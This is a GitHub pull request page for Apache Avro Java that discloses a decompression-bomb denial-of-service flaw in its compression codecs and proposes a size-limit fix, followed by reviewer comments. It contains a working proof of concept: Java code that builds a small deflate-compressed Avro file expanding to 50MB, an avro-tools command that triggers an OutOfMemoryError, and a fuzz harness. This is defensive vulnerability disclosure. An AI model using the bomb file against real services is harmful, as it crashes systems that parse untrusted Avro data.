Skip to content

Conversation

@OwenSanzas
Copy link

@OwenSanzas OwenSanzas commented Jan 14, 2026

Decompression Bomb in Avro Java Codec Layer causes OutOfMemoryError

Summary

All Avro Java compression codecs (Deflate, Zstandard, XZ, BZip2, Snappy) decompress data without any size limit, allowing an attacker to craft a small Avro file (~50KB) that expands to an extremely large size (~50MB+), causing OutOfMemoryError and crashing the JVM.

Root Cause

The codec implementations decompress data into unbounded ByteArrayOutputStream without checking the output size:

Vulnerable Code (DeflateCodec.java:83)

@Override
public ByteBuffer decompress(ByteBuffer data) throws IOException {
  ByteArrayOutputStream baos = new ByteArrayOutputStream();
  // NO SIZE LIMIT - decompresses until OOM!
  try (InflaterOutputStream ios = new InflaterOutputStream(baos, inflater)) {
    ios.write(data.array(), computeOffset(data), data.remaining());
  }
  return ByteBuffer.wrap(baos.toByteArray());
}

PoC

Trigger file

A crafted poc.avro file (49KB) that decompresses to 50MB:

  • Schema: {"type":"record","name":"Payload","fields":[{"name":"data","type":"bytes"}]}
  • Codec: deflate (level 9)
  • Payload: 50MB of zeros (compresses ~1000:1)

How to generate poc.avro

// CreatePoC.java
import org.apache.avro.Schema;
import org.apache.avro.file.CodecFactory;
import org.apache.avro.file.DataFileWriter;
import org.apache.avro.generic.GenericData;
import org.apache.avro.generic.GenericDatumWriter;
import org.apache.avro.generic.GenericRecord;
import java.io.File;
import java.nio.ByteBuffer;

public class CreatePoC {
    public static void main(String[] args) throws Exception {
        String SCHEMA = "{\"type\":\"record\",\"name\":\"Payload\",\"fields\":[" +
                        "{\"name\":\"data\",\"type\":\"bytes\"}]}";

        Schema schema = new Schema.Parser().parse(SCHEMA);
        DataFileWriter<GenericRecord> writer = new DataFileWriter<>(new GenericDatumWriter<>(schema));

        writer.setCodec(CodecFactory.deflateCodec(9));  // Max compression
        writer.create(schema, new File("poc.avro"));

        // 50MB of zeros - compresses ~1000:1
        byte[] payload = new byte[50 * 1024 * 1024];

        GenericRecord record = new GenericData.Record(schema);
        record.put("data", ByteBuffer.wrap(payload));
        writer.append(record);
        writer.close();
    }
}
# Generate poc.avro (needs large heap to create)
javac -cp avro-1.13.0.jar CreatePoC.java
java -Xmx256m -cp .:avro-1.13.0.jar:jackson-core-2.x.jar:jackson-databind-2.x.jar CreatePoC

Trigger Method 1: Official avro-tools CLI

java -Xmx32m -jar avro-tools-1.13.0-SNAPSHOT.jar tojson poc.avro

Output:

Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    at java.base/java.util.Arrays.copyOf(Arrays.java:3541)
    at java.base/java.io.ByteArrayOutputStream.ensureCapacity(ByteArrayOutputStream.java:100)
    at java.base/java.io.ByteArrayOutputStream.write(ByteArrayOutputStream.java:132)
    at java.base/java.util.zip.InflaterOutputStream.write(InflaterOutputStream.java:249)
    at org.apache.avro.file.DeflateCodec.decompress(DeflateCodec.java:83)
    at org.apache.avro.file.DataFileStream$DataBlock.decompressUsing(DataFileStream.java:381)
    at org.apache.avro.file.DataFileStream.hasNext(DataFileStream.java:227)
    at org.apache.avro.tool.DataFileReadTool.run(DataFileReadTool.java:96)
    at org.apache.avro.tool.Main.run(Main.java:67)
    at org.apache.avro.tool.Main.main(Main.java:56)

Other affected avro-tools commands: cat, count, getmeta, getschema, concat, recodec


Trigger Method 2: Fuzzer (oss-fuzz / Jazzer)

package com.example;

import com.code_intelligence.jazzer.api.FuzzedDataProvider;
import com.code_intelligence.jazzer.junit.FuzzTest;
import org.apache.avro.file.DataFileReader;
import org.apache.avro.file.SeekableByteArrayInput;
import org.apache.avro.generic.GenericDatumReader;
import org.apache.avro.generic.GenericRecord;

class DecompressionBombFuzzer {

    @FuzzTest
    void fuzzDecompressionBomb(FuzzedDataProvider data) {
        byte[] input = data.consumeRemainingAsBytes();
        if (input.length < 32) return;

        try {
            SeekableByteArrayInput sin = new SeekableByteArrayInput(input);
            GenericDatumReader<GenericRecord> reader = new GenericDatumReader<>();
            try (DataFileReader<GenericRecord> fileReader = new DataFileReader<>(sin, reader)) {
                while (fileReader.hasNext()) {
                    fileReader.next();
                }
            }
        } catch (OutOfMemoryError e) {
            throw e;
        } catch (Exception e) {
            // Ignore parse errors
        }
    }
}

Build and run:

# Build with oss-fuzz
python3 infra/helper.py build_fuzzers --clean --engine libfuzzer --sanitizer address avro

# Run fuzzer with poc.avro as seed corpus
mkdir -p corpus && cp poc.avro corpus/
cd build/out/avro
./DecompressionBombFuzzer corpus/

Impact

Aspect Details
Type Denial of Service (DoS)
Severity High
Attack Vector Malicious Avro file
Affected Components DataFileReader, DataFileStream, avro-tools
Affected Codecs Deflate, Zstandard, XZ, BZip2, Snappy
CWE CWE-409 (Improper Handling of Highly Compressed Data)

Suggested Fix

Add maximum decompression size limit in DeflateCodec.java:

@Override
public ByteBuffer decompress(ByteBuffer data) throws IOException {
  final long maxDecompressedSize = 200 * 1024 * 1024; // 200MB limit

  ByteArrayOutputStream baos = new ByteArrayOutputStream();
  byte[] buffer = new byte[8192];
  long totalBytes = 0;

  inflater.reset();
  inflater.setInput(data.array(), computeOffset(data), data.remaining());

  while (!inflater.finished()) {
    int len;
    try {
      len = inflater.inflate(buffer);
    } catch (DataFormatException e) {
      throw new IOException("Invalid deflate data", e);
    }
    if (len == 0 && inflater.needsInput()) break;

    totalBytes += len;
    if (totalBytes > maxDecompressedSize) {
      throw new AvroRuntimeException(
          "Decompressed size " + totalBytes + " exceeds maximum allowed size " + maxDecompressedSize);
    }
    baos.write(buffer, 0, len);
  }

  return ByteBuffer.wrap(baos.toByteArray());
}

Note: Other codecs (ZstandardCodec, XZCodec, BZip2Codec, SnappyCodec) have the same issue. We can discuss the fix for those in follow-up.

…b DoS

Add maximum decompression size limit in DeflateCodec to prevent
OutOfMemoryError when processing maliciously crafted Avro files
with high compression ratios (decompression bombs).

The limit defaults to 200MB and can be configured via system property:
org.apache.avro.limits.decompress.maxLength
@github-actions github-actions bot added the Java Pull Requests for Java binding label Jan 14, 2026
@OwenSanzas OwenSanzas changed the title [AVRO-4081] Add decompression size limit to prevent decompression bomb DoS Add decompression size limit to prevent decompression bomb DoS Jan 14, 2026
@OwenSanzas
Copy link
Author

This is also a quick fix. I see some other modules have the same pattern.


@Override
public ByteBuffer decompress(ByteBuffer data) throws IOException {
long maxLength = getMaxDecompressLength();
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

There is no need to call this method on every decompress().
You can read it once in a static {...} block and reuse it.

try {
return Long.parseLong(prop);
} catch (NumberFormatException e) {
// Use default
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This probably should be logged as a WARNING.

String prop = System.getProperty(MAX_DECOMPRESS_LENGTH_PROPERTY);
if (prop != null) {
try {
return Long.parseLong(prop);
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This will also accept a negative and 0 as values which are not very sensible.
Probably these should be reported earlier here ?!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

Java Pull Requests for Java binding

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants